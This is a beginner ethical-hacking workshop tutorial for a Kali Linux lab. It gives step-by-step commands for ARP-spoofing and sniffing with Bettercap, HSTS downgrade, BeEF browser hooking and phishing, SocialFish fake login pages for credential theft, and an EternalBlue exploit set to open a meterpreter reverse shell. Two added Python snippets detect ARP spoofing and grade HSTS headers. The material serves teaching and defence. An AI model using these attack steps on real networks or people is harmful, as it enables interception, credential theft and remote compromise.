Dec 28th @ in5 - Introduction to Ethical Hacking and Cyber Security. At this session, we went over the basics of cybersecurity and showed how you can protect yourself from some common attacks. Using Kali Linux as a platform, we isolated exploits and recreated some of the more common major attacks (e.g. ‘Man-In-The-Middle’) using a variety of penetration testing tools such as the Browser Exploitation Framework, and also showed how to inoculate your systems against each malicious action.
This is a beginner workshop tutorial on network hacking tools such as BeEF, Social Fish and Bettercap.
https://www.facebook.com/makesmartthings/videos/686763711857192/
Copy the entire link, instead of clicking on the hyperlink.
https://drive.google.com/open?id=1t2LhMz6TcZ1ne5fXdH1WG3NwOr57WIb_
Kali Linux image: https://images.offensive-security.com/virtual-images/kali-linux-2019.4-vbox-amd64.ova
Installation instructions for Windows: https://www.youtube.com/watch?v=XlJ7FsI0wj4
Installation instructions for Mac: https://www.youtube.com/watch?v=J7VFSrye8u0
Windows 7 image: https://softlay.net/operating-system/windows-7-ultimate-iso-download.html
Installation instructions for Windows: https://www.youtube.com/watch?v=cpRTGtCmZUs
Installation instructions for Mac: https://www.youtube.com/watch?v=HAKJdqYEEmY
Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
Power ON the Machine
Okay, to start working, we first need to search for “VirtualBox” and open it, then select the virtual machine and click Start at the top. This way we have everything set up to start working with Kali Linux, with the default username: root and pass: toor
apt install bettercap
apt-get update
net.probe on
net.show
help arp.spoof
Now we proxy the connection: we want the victim to believe we are the gateway, and we want the gateway's responses to pass through us as well, so we enable full-duplex spoofing.
set arp.spoof.fullduplex true
To select the victim’s IP address that we want to target, just fill the “bla” spaces with numbers.
set arp.spoof.targets bla.bla.bla.bla
arp.spoof on
To capture the victim’s data aka “sniffing”
net.sniff on
Now we use Wireshark, a tool that captures the victim’s information and decodes it into a form that is easy for the user to read. To run the program, all you need to do is type “wireshark” in a new terminal.
Now, to start capturing on the wanted interface, select “eth0” and observe the traffic. Choose a site, stop the capture, then write “http” in the filter.
Now is Testing Time!!! So all you need to do is go to any “http” Website and not “https” and then you can enter some data and check the “POST” Packets to see how your data has been sniffed and sent to the hacker.
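How a defender can spot the ARP spoofing shown above from the victim's side, as an added example that is not part of the original workshop material: it parses `ip neigh` output and flags a MAC that answers for several IPs or a gateway MAC that differs from a pinned value. The sample tables, addresses and the pinned MAC are constructed.

```python
"""Flag signs of ARP spoofing in a Linux neighbour table (`ip neigh` output)."""
import re
from collections import defaultdict

# Matches lines such as: 192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\s+(?P<state>\S+)"
)

def parse_ip_neigh(text):
    """Return {ip: mac} for entries with a resolved MAC (skips FAILED/INCOMPLETE)."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def find_spoof_indicators(table, gateway_ip, pinned_gateway_mac=None):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # One MAC answering for several IPs is what a poisoned cache looks like:
    # the spoofing host's MAC shows up for its own IP and for the gateway's.
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            tag = " (includes gateway)" if gateway_ip in ips else ""
            findings.append(f"{mac} claims {', '.join(sorted(ips))}{tag}")
    # If the real gateway MAC was recorded on a trusted network, compare it.
    gw_mac = table.get(gateway_ip)
    if pinned_gateway_mac and gw_mac and gw_mac != pinned_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} is at {gw_mac}, expected {pinned_gateway_mac.lower()}")
    return findings

# Constructed sample: neighbour table on the victim before and during spoofing.
CLEAN = """192.168.1.1 dev eth0 lladdr 52:54:00:12:35:00 REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:4e:66:a1 STALE
192.168.1.40 dev eth0  FAILED"""
POISONED = """192.168.1.1 dev eth0 lladdr 08:00:27:4e:66:a1 REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:4e:66:a1 REACHABLE"""

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_spoof_indicators(parse_ip_neigh(sample), "192.168.1.1",
                                          "52:54:00:12:35:00"))
```

Where the real gateway MAC is known, the pinned comparison is the stronger check, since the duplicate-MAC heuristic also fires for legitimate proxy ARP.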
So now, after learning how to use it on http, we will learn how to downgrade any website such as “https” and “hsts” to “http”. We begin by going to the below directory and deleting the file named “hstshijack”
/usr/share/bettercap/caplets
Now we download the new file by cloning the github repository of the “hstshijack” tool.
git clone https://github.com/The-Assembly/Intro-to-Ethical-Hacking
Then, we go to the downloads folder, cut the file named “hstshijack” and paste it in place of the previous file, following this path: /usr/share/bettercap/caplets
Lastly, to use the tool, we type the following in the terminal and then follow the above steps, starting from no. 3, to perform the attack.
hstshijack/hstshijack
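A site-owner check against the downgrade described above, as an added example that is not part of the original workshop material: it grades a Strict-Transport-Security header value for the gaps that leave visitors reachable over plain http. The sample header values are constructed; the one-year threshold is the minimum that browser preload lists accept.

```python
"""Grade a Strict-Transport-Security header value (RFC 6797)."""

ONE_YEAR = 31536000  # seconds; minimum max-age accepted by browser preload lists

def parse_hsts(value):
    """Parse the header into {directive: value-or-None}; names are case-insensitive."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') or None
    return directives

def hsts_gaps(value):
    """Return the weaknesses of a header value; pass None when the header is absent."""
    if value is None:
        return ["no HSTS header: the browser will accept plain http for this host"]
    d = parse_hsts(value)
    raw_age = d.get("max-age")
    if raw_age is None or not (raw_age.isascii() and raw_age.isdigit()):
        return ["max-age missing or invalid: the browser ignores the whole header"]
    gaps = []
    age = int(raw_age)
    if age == 0:
        gaps.append("max-age=0 removes the host from the browser's HSTS list")
    elif age < ONE_YEAR:
        gaps.append(f"max-age={age} is below one year ({ONE_YEAR})")
    if "includesubdomains" not in d:
        gaps.append("includeSubDomains missing: subdomains may still load over http")
    if "preload" not in d:
        gaps.append("preload missing: not eligible for preload lists, first visit unprotected")
    return gaps

# Constructed sample header values.
SAMPLES = {
    "strong": "max-age=63072000; includeSubDomains; preload",
    "short": "max-age=300",
    "absent": None,
}

if __name__ == "__main__":
    for name, header in SAMPLES.items():
        print(name, hsts_gaps(header))
```

Feed it the header value from the site's HTTPS response; an empty list means the policy meets the preload requirements.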
BeEF is a penetration testing tool that focuses on web browser vulnerabilities, so that web browsers can be secured against malicious attacks.
First, we have to update the repositories to make sure that we start fresh
apt-get update
We install the tool
apt install beef-xss
We initialize the tool by typing “beef-xss”
Then you are asked to type a password. Enter any password that you choose. However, make sure you remember this password as you will need it later for a following step.
Look for the “script” tag and copy it.
To perform our attack, you need to inject the code line into the website by pasting it into the Apache server's page, so navigate to the wanted folder by going to “home” and entering the following path
/var/www/html/index.html
Paste the script line in the above file, then spot the IP address at the bottom of the file and fill in your own device's IP address.
Go to the browser and add a zero to the ip address at the top as such “172.0.0.1”. You’ll be directed to a login page so just enter “beef” as username and the password you have set before.
Now, we have to run the Apache Server by typing the following commands
apt install apache2
service apache2 start
Then, we have to hook a server file, so we go to the browser and paste the IP address of the victim, which in this case is our own IP address that we got from the -ipconfig- command. You should then be redirected to a page with a message that says that you're hooked.
Next, we should have a connection on some networks under online browsers. So under online browsers, after clicking on the wanted network address, you’ll find a list of commands and ways to play with and execute attacks on the victim such as “Alert Dialogue” option. This will display the directed message on the victim’s device.
There are many other commands that could be performed, such as Pretty Theft and Google Phishing, which creates a fake page exactly like Google to record your activities.
SocialFish is a tool that is used to create a duplicate of a popular site like Facebook, Instagram, Twitter, etc. so that the hacker could trick the victim into thinking this is the real page and have them log in with their data, and then be able to manipulate the data and perhaps blackmail them with it.
git clone https://github.com/UndeadSec/SocialFish
cd SocialFish/
apt-get install python3 python3-pip python3-dev -y
python3 -m pip install -r requirements.txt
python3 SocialFish.py root pass
Then, you go to the top under the Social Fish logo, you’ll notice a line that says “Go to http://0.0.0.0:5000/neptune to start”. So you paste the ip address into your browser.
You will be redirected to a login page where you can enter “root” for username and “pass” for password.
Now, you could write the name of the website you want to clone and the one to be redirected to. For example:
Now if you copy the ip address “0.0.0.0:5000/Neptune” You’ll be redirected to the cloned page which in this case is facebook. This is a fake page based on facebook design and everything that you enter gets copied and sent to the hacker. So to test it, just enter any garbage text and submit.
You can check your entries or responses got from the fake site we cloned by going down on the original page and clicking “View” to see whatever username and pass were entered.
Zenmap is the graphical user interface for the Nmap security scanner and provides hundreds of options. It lets users do things like save scans and compare them, view network topology maps, view displays of ports running on a host or all hosts on a network, and store scans in a searchable database.
Click on the Zenmap icon from the left panel on linux desktop
Go to the terminal to get the gateway
route -n
Then we go to the target tab and enter the gateway found with /24
Then we choose “Quick Scan plus” as a profile
After waiting for some time, we will be able to see all IP addresses that are connected on that gateway
We choose one as our target. In this case, we will choose one with Windows 7
Now we don’t know whether this network is vulnerable or not so for that we will be using a tool called “Metasploit” which will be discussed further in the next step.
The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
/usr/share/metasploit-framework/modules/exploits/windows/smb
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
to see the different things we could do with the tool.
set RHOSTS <<victim’s ip add>>
use exploit/windows/smb/eternalblue_doublepulsar
set RHOSTS <<victim’s ip add>>
set PROCESSINJECT lsass.exe
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <<your ip address>>